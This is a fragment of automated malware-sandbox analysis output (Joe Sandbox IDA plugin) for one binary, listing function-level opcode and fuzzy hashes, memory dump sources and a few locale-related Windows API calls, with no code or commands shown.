                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8C1B074A006468FCB24EFE8C490ABEB7B3AF06314F24462DD45697392C771AD46CF92
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 3f61c0a95e9a60c14b5b7e8faef6eb4b123162ea1b04d6a93cdd4481fb63f805
                                                                                                                                                                                                                                                                  • Instruction ID: aa65b32cdf06d1cec7290a4633afb75ca813dc09bde8a41d0031b868a16e7987
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f61c0a95e9a60c14b5b7e8faef6eb4b123162ea1b04d6a93cdd4481fb63f805
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08C1BE74A00A468FCB24EF28C584ABABBA3BF47314F24465DE45797391C732AD46CF91
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 2757e050080f33b728b8b5c25174ef0e94aaa0c0f22b9e835bf6a9324968aa54
                                                                                                                                                                                                                                                                  • Instruction ID: df08833a7841234513b9ea8eab11768df7e046c8490a50ed9d797469e7d80351
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2757e050080f33b728b8b5c25174ef0e94aaa0c0f22b9e835bf6a9324968aa54
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C193709006468FCB64EFA8C4906AAB7E3EF17314F24466DD496973A2C731ED46CF52
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D56EB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0068f7ec99dc46c3017c6f835f20fb48ca528ed0801720e96796bc0c9e38e4d9
                                                                                                                                                                                                                                                                  • Instruction ID: b0ac2c83dd95e141c1be227b9c847f6a8bd9627912af8f181d8e44a21daecc4d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0068f7ec99dc46c3017c6f835f20fb48ca528ed0801720e96796bc0c9e38e4d9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821C272A00606EBDF289A24DC81EBA73AAEF54311F20007FF906C6741EB75ED058754
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: a41508205ec91a0efa82eeba8d8e859551922dd662066a5bceccdcc3807a3f94
                                                                                                                                                                                                                                                                  • Instruction ID: 86bc82d97443d2ebda446f0663ba95a46543caebaa6b088c2ef5cef4e7761af5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a41508205ec91a0efa82eeba8d8e859551922dd662066a5bceccdcc3807a3f94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB1BD70A0060A9ACB65FFA8C5906FEB7F3AF46300F10492DE456A7761D730AD46CF96
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 227596aa48b5cf8b3671ac767d2c79ac7325d536b40da31a134dbdaaef61253c
                                                                                                                                                                                                                                                                  • Instruction ID: f2c6f750d618fc4cf02c74556df2d8dc09c03278c84d01870c01d444899ea0b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 227596aa48b5cf8b3671ac767d2c79ac7325d536b40da31a134dbdaaef61253c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBB1AFB0A0060A9FEB68CFA8C5946EFBBF3AF44304F10861DD556A7750D730AE86CB55
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: ec8b40b5fed45bcfeeaa47a85cac2be94c8d759873b50704dbdcd23464246a40
                                                                                                                                                                                                                                                                  • Instruction ID: 39456a31c3a7bf7a8f4dbce3ecbbe7ae96d30896f6895343b20121e09c03b84e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec8b40b5fed45bcfeeaa47a85cac2be94c8d759873b50704dbdcd23464246a40
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5B1B030A0060A9ACB64EFA8C5906FFB7F3AF46314F10492DD456A7390D730AD46CF96
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 46f597134efa74e8be3e282570831be78394f5d29fbc446326fc99085b97ee5d
                                                                                                                                                                                                                                                                  • Instruction ID: 4b52e9d6b2352e8a79c521fdfac1d0d6fca3eb1c2a41b72019d5624e793aafa1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46f597134efa74e8be3e282570831be78394f5d29fbc446326fc99085b97ee5d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9572AFB4A0020A9FCF24DF68C891AFEB7B6EF45314F14416DD946A7345D772AE82CB90
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 0b31bcc3f0ffd5bdf239017ace519ff5dc2b8a3d6c689e828cab6c5969eb227b
                                                                                                                                                                                                                                                                  • Instruction ID: d05cac7b0198553781a93ac388aa4d7da260c676f873609adce17c5bd9ef9581
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b31bcc3f0ffd5bdf239017ace519ff5dc2b8a3d6c689e828cab6c5969eb227b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8B1C27090060A8BCF24AE68C4A16FEBBE7EF56314F14091ED85297381DB37AD42CF95
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: e0f3d0b1b7177848c9ea190608e8fd8a6456997b3a862065a676c2d10767692e
                                                                                                                                                                                                                                                                  • Instruction ID: bb94bf6c4afcee08cbc2181661e9077cbbf843b21fc237782a0570aeddbafac4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0f3d0b1b7177848c9ea190608e8fd8a6456997b3a862065a676c2d10767692e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2B1C070A0070A8BDB64AE68C4916FFB7A7AF43300F140A1EE55297391C736ED46CF51
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: b38474da1931c81ca97ac5126a9c32d6e65d5e104c18915d73342cbaf3bfc224
                                                                                                                                                                                                                                                                  • Instruction ID: 3f67e6b8506781c0cbb53cb8dc715f2b5fcc4e81313f504211cb76ff96dd45d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b38474da1931c81ca97ac5126a9c32d6e65d5e104c18915d73342cbaf3bfc224
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63B1C07090060A8FCB24AF68C4956FFB7A7AF46304F14061ED453A7791CB76AE46CF92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(006D53B0,00000001), ref: 006D52B4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb5f307a371fdcf9544b043b595521e75163e727fb0887db0cd76f07c2bd05ab
                                                                                                                                                                                                                                                                  • Instruction ID: 7537d95ec47c685eba2810d8fb8529d6688709c460f42e779541b1e032a20a79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5f307a371fdcf9544b043b595521e75163e727fb0887db0cd76f07c2bd05ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47112937A04B059FDB189F38C8915BAB792FF84359B15442EE94787B40E771B942C780
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006D55CC,00000000,00000000,?), ref: 006D597D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
APIs
• EnumSystemLocalesW.KERNEL32(006D5697,00000001), ref: 006D534D
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
APIs
• EnumSystemLocalesW.KERNEL32(Function_00093629,00000001,007038D0,0000000C), ref: 006C3677
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
APIs
• GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 006769CA
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_630000_file.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• EnumSystemLocalesW.KERNEL32(006D50F0,00000001), ref: 006D51F7
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: a408e87f9bba439aae4cf5edb2ab6f4a0e390ea9f4e1ae685b3592893f37ebae
                                                                                                                                                                                                                                                                  • Instruction ID: f3a966c4fcd0227970f9266c39830beab2e8591ed377671ab2e9d6080aa22687
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a408e87f9bba439aae4cf5edb2ab6f4a0e390ea9f4e1ae685b3592893f37ebae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75F05C35B0024597CB049F39C8557667F91EFC1714F06405AEE068BB41C6719842C7D0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 006C43BD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 08eaf533caf6b2811d81d95633b6ce1ca203d4c834b596f9909d7daafe3f1151
                                                                                                                                                                                                                                                                  • Instruction ID: 3efc81adaabee1712a2a6854700e1573ffd306bc83aa45980581eeb36ab0b65d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08eaf533caf6b2811d81d95633b6ce1ca203d4c834b596f9909d7daafe3f1151
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE04F35500128BBCF126F61EC14FFE3E16EF45760F008119FD5965260CF758E21AAD9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_00093629,00000001), ref: 006C3848
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: e4b947c7981557d3e21eddcf3783723622815a7f44125e70edd854d43539e4b1
                                                                                                                                                                                                                                                                  • Instruction ID: 467504f19d68bce7132c27e7d9d245391df4a35334d54ba88f2aa2f4cfc7c525
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b947c7981557d3e21eddcf3783723622815a7f44125e70edd854d43539e4b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7D05E79504308EFDB045B52FC0A9153B66E3C2310B00C01BF806067A1DB7698108E88
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Zero
                                                                                                                                                                                                                                                                  • API String ID: 0-200040108
                                                                                                                                                                                                                                                                  • Opcode ID: ac9256ae9bda6e07616a4dac0c570027a9c5c569507057adca8869896eaf5caf
                                                                                                                                                                                                                                                                  • Instruction ID: 35d65879b92dba6d0d69ab9801e0368162f3715fa5422b478bbfc7692bd30fdf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac9256ae9bda6e07616a4dac0c570027a9c5c569507057adca8869896eaf5caf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B38156719022AE9BCB24DB65E9987E8B7F2FF19304F1441E9E84993390E3365E81CF04
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `nt
                                                                                                                                                                                                                                                                  • API String ID: 0-461431102
                                                                                                                                                                                                                                                                  • Opcode ID: c94e4018ff227f3b3a76ede4d58b58ff4ddd7aa23aa736906b2a58cd6996eb5a
                                                                                                                                                                                                                                                                  • Instruction ID: d36bd10769ff9877fefec999f54ab802f737148bd7bad48c6a0d803ba96e35dd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94e4018ff227f3b3a76ede4d58b58ff4ddd7aa23aa736906b2a58cd6996eb5a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF09072A542359BC7369A5CCA29B9473EAFB2AB10F110057E111EB350C2B5DE00C7C4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: `nt
                                                                                                                                                                                                                                                                  • API String ID: 0-461431102
                                                                                                                                                                                                                                                                  • Opcode ID: 1a743c8d9038b33c6962dd91c8bbf3126eaf9621ae7cb1311f10260607313bd2
                                                                                                                                                                                                                                                                  • Instruction ID: aebd220cdfd8317012984cb308aa83d8dd4fa04f284badd24547558f808d5c94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a743c8d9038b33c6962dd91c8bbf3126eaf9621ae7cb1311f10260607313bd2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3F0B435A44206EFC715CF2CC928F5677EAFB95304F204066F905D7390D671DE40D640
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: \nt
                                                                                                                                                                                                                                                                  • API String ID: 0-921828810
                                                                                                                                                                                                                                                                  • Opcode ID: 8337eb67d7ae5452d7eceaf49319b66047a5b7879dece3f23d73224e13b5ded3
                                                                                                                                                                                                                                                                  • Instruction ID: 1ad5ed15edb32d3de3cd003dc47a15dfadc500f56b59bc999b107ba9dd011ed7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8337eb67d7ae5452d7eceaf49319b66047a5b7879dece3f23d73224e13b5ded3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F03071A113649BCB16DB4CD415A8973EDEB59B54F1140ABE401D7351C7B4DD00C7C4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Xnt
                                                                                                                                                                                                                                                                  • API String ID: 0-838358294
                                                                                                                                                                                                                                                                  • Opcode ID: ba8837837dc3827eebe8ae2e5a2a0f74143aadca36fe603af9815a7b170bd7da
                                                                                                                                                                                                                                                                  • Instruction ID: 16d4f3bbd9aee887dd4b7ae42cb3cc9fcf09a3cf9c170da2e3882b08721fe156
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba8837837dc3827eebe8ae2e5a2a0f74143aadca36fe603af9815a7b170bd7da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF03932A113B4AFCB26CB88D815A9973E9EB56B61F1640AAF541EB354C3B4DE40C7C4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Xnt
                                                                                                                                                                                                                                                                  • API String ID: 0-838358294
                                                                                                                                                                                                                                                                  • Opcode ID: 2cb9b0ee128dc00c83b55e9bc2a6d2e0b3f4a0d70f3270a38316b126282f1d56
                                                                                                                                                                                                                                                                  • Instruction ID: 41723d2a646d49aa5b9aeb28b07c90dd31c9c4b1ad702e51582a6353eafcb6f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb9b0ee128dc00c83b55e9bc2a6d2e0b3f4a0d70f3270a38316b126282f1d56
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E0657AA00354EFCB4ACFA9C554A4AB7E9EB49744F2144AAE809C7350D338DE41CB41
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: \nt
                                                                                                                                                                                                                                                                  • API String ID: 0-921828810
                                                                                                                                                                                                                                                                  • Opcode ID: 93b39ec622091d085dc19b131531a9caf7f8762345a0df0e8db217bc715b20a4
                                                                                                                                                                                                                                                                  • Instruction ID: 05ce94f54ad84ed51e81e90a3a2be0d5180bf833bd04bdd332df9b62695d33a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93b39ec622091d085dc19b131531a9caf7f8762345a0df0e8db217bc715b20a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE06539A10245EFCB45CBA9C564A49B7FAEB4AB84F2180B9E809D7350D338DE40CB80
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                                                  • API String ID: 0-595813830
                                                                                                                                                                                                                                                                  • Opcode ID: 3dc8b733bdccfe566bc790f7716e71aae9cf3bc6d85ea6bdb88b76e7e9e3d54f
                                                                                                                                                                                                                                                                  • Instruction ID: 3c19383690455f26b062c1e8da10256a620a7d3dfed57ac35da7c041fb1d7825
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dc8b733bdccfe566bc790f7716e71aae9cf3bc6d85ea6bdb88b76e7e9e3d54f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5E0C23768463C73823022906C06FB97A86CF51BB2B058062FB0865290DEA54861C2C5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 397187078afbc73a77af68bd91820e66db5ac4c2a21b4e6c1584caad7e47903e
                                                                                                                                                                                                                                                                  • Instruction ID: 40b9790a9efc1c881de3ecc1cf5937b4ecad01d08bcbf2d557374b2b200396d4
